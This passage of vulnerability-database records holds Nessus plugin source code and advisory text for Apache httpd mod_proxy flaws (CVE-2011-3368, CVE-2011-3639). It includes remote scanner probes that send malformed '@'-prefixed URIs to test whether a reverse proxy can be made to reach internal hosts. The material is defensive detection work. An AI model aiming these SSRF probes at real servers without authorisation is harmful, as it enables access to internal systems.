headers['$code'];\n\n # the patched server should always send a 400. \n # we'll explicitly check for a 503 (resulting from trying to connect to a closed port)\n if (http_code == 503)\n {\n # this will prevent the other plugin (that checks for the\n # incomplete fix for this CVE) from running\n set_kb_item(name:'/tmp/CVE-2011-3368', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus verified this by sending the following request :\\n\\n' +\n chomp(http_last_sent_request()) + '\\n';\n\n if (report_verbosity > 0)\n {\n report +=\n '\\nWhich resulted in a non-400 response :\\n\\n' +\n res[0] +\n chomp(res[1]) + '\\n';\n }\n\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n }\n}\nexit(1, 'Unable to determine if the system is vulnerable on port ' + port);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:18:00", "description": "It was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. (CVE-2011-3348)", "edition": 24, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : httpd (ALAS-2011-9)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3348"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:mod_ssl", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-tools", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2011-9.NASL", "href": "https://www.tenable.com/plugins/nessus/78270", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-9.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78270);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_xref(name:\"ALAS\", value:\"2011-9\");\n script_xref(name:\"RHSA\", value:\"2011:1391\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-9)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. (CVE-2011-3348)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-9.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:17:56", "description": "The MITRE CVE database describes these CVEs as :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character. \n\nThe mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when\nused with mod_proxy_balancer in certain configurations, allows remote\nattackers to cause a denial of service (temporary 'error state' in the\nbackend server) via a malformed HTTP request.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker.\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed.", "edition": 23, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : httpd (ALAS-2011-09)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3348"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:mod_ssl", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-tools", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2011-09.NASL", "href": "https://www.tenable.com/plugins/nessus/69568", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-09.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69568);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2015/01/30 14:43:52 $\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_xref(name:\"ALAS\", value:\"2011-09\");\n script_xref(name:\"RHSA\", value:\"2011:1391\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-09)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MITRE CVE database describes these CVEs as :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character. \n\nThe mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when\nused with mod_proxy_balancer in certain configurations, allows remote\nattackers to cause a denial of service (temporary 'error state' in the\nbackend server) via a malformed HTTP request.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker.\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-9.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum upgrade httpd' to upgrade your system. Then run 'service\nhttpd restart' to restart the Apache HTTP Server.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:20:55", "description": "The version of Apache HTTP Server running on the remote host has an\ninformation disclosure vulnerability. When configured as a reverse\nproxy, improper use of the RewriteRule and ProxyPassMatch directives\ncould cause the web server to proxy requests to arbitrary hosts. This\ncould allow a remote attacker to indirectly send requests to intranet\nservers by making specially crafted HTTP 0.9 requests.\n\nThis vulnerability only affects versions 2.2.x before 2.2.18 that have\nbackported the fix for CVE-2011-3368.", "edition": 23, "published": "2012-02-09T00:00:00", "title": "Apache HTTP Server mod_proxy Reverse Proxy HTTP 0.9 Information Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3639", "CVE-2011-3368"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_MOD_PROXY_INFO_LEAK2.NASL", "href": "https://www.tenable.com/plugins/nessus/57875", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(57875);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2011-3639\");\n script_bugtraq_id(51869);\n\n script_name(english:\"Apache HTTP Server mod_proxy Reverse Proxy HTTP 0.9 Information Disclosure\");\n script_summary(english:\"Make a malformed HTTP request\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The web server running on the remote host has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Apache HTTP Server running on the remote host has an\ninformation disclosure vulnerability. When configured as a reverse\nproxy, improper use of the RewriteRule and ProxyPassMatch directives\ncould cause the web server to proxy requests to arbitrary hosts. This\ncould allow a remote attacker to indirectly send requests to intranet\nservers by making specially crafted HTTP 0.9 requests.\n\nThis vulnerability only affects versions 2.2.x before 2.2.18 that have\nbackported the fix for CVE-2011-3368.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545#c15\");\n script_set_attribute(attribute:\"see_also\", value:\"http://article.gmane.org/gmane.comp.apache.devel/45983\");\n script_set_attribute(attribute:\"see_also\", value:\"http://svn.apache.org/viewvc?view=revision&revision=1188745\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Contact the distro/vendor for the latest update of Apache httpd.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/25\"); # fixed upstream\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/09\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"apache_mod_proxy_info_leak.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"/tmp/CVE-2011-3368\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\n# Make sure this looks like Apache unless paranoid\nif (report_paranoia < 2)\n{\n server = http_server_header(port:port);\n\n if ( 'ibm_http_server' >!< tolower(server) && 'apache' >!< tolower(server) && 'oracle http server' >!< tolower(server) && 'oracle-http-server' >!< tolower(server) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like an Apache-based httpd');\n\n # looks like Apache _httpd_\n if ('apache' >< tolower(server) && ( 'coyote' >< tolower(server) || 'tomcat' >< tolower(server)) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like Apache httpd');\n}\n\npages = make_list('/');\n\nforeach page (pages)\n{\n # GET 1324:@target-host/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host/page\n # instead of responding with an HTTP 400\n url = strcat(unixtime(), ':@', get_host_ip(), page);\n res = http_send_recv3(method:'GET', item:url, version:9, port:port, exit_on_fail:TRUE);\n\n # the patched server should always send a 400.\n # HTTP 0.9 won't send a status line so the best we can do is check for the default 400 page.\n # Need to skip over pages that respond to valid requests with a 503, since we will rely on a\n # 503 response after making the next request\n if ('<title>400 Bad Request</title>' >!< res[2] && '<title>503 Service Temporarily Unavailable</title>' >!< res[2])\n {\n # GET 1324:@target-host:likely-closed-port/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host:likely-closed-port/page\n # instead of responding with an HTTP 400\n url = strcat(unixtime(), ':@localhost:', (rand() % 535 + 65000), page);\n res = http_send_recv3(method:'GET', item:url, version:9, port:port, exit_on_fail:TRUE);\n\n # the patched server should always send a 400. \n # Again, we won't get a status code via HTTP 0.9 so the best we can do is check for the default\n # 503 page (resulting from trying to connect to a closed port)\n if ('<title>503 Service Temporarily Unavailable</title>' >< res[2])\n {\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus verified this by sending the following request :\\n\\n' +\n chomp(http_last_sent_request()) + '\\n';\n\n if (report_verbosity > 0)\n {\n report +=\n '\\nWhich resulted in a non-400 response :\\n\\n' +\n chomp(res[2]) + '\\n';\n }\n\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n }\n}\nexit(0, 'The web server listening on port '+port+' is likely not affected.');\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T04:37:27", "description": "From Red Hat Security Advisory 2011:1392 :\n\nUpdated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.", "edition": 23, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 / 5 : httpd (ELSA-2011-1392)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-suexec", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2011-1392.NASL", "href": "https://www.tenable.com/plugins/nessus/68377", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:1392 and \n# Oracle Linux Security Advisory ELSA-2011-1392 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68377);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/10/25 13:36:09\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"RHSA\", value:\"2011:1392\");\n\n script_name(english:\"Oracle Linux 4 / 5 : httpd (ELSA-2011-1392)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:1392 :\n\nUpdated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-October/002421.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-October/002422.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"httpd-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-devel-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-manual-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-suexec-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"mod_ssl-2.0.52-49.ent.0.1\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-53.0.2.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-53.0.2.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-53.0.2.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-53.0.2.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T05:34:59", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, 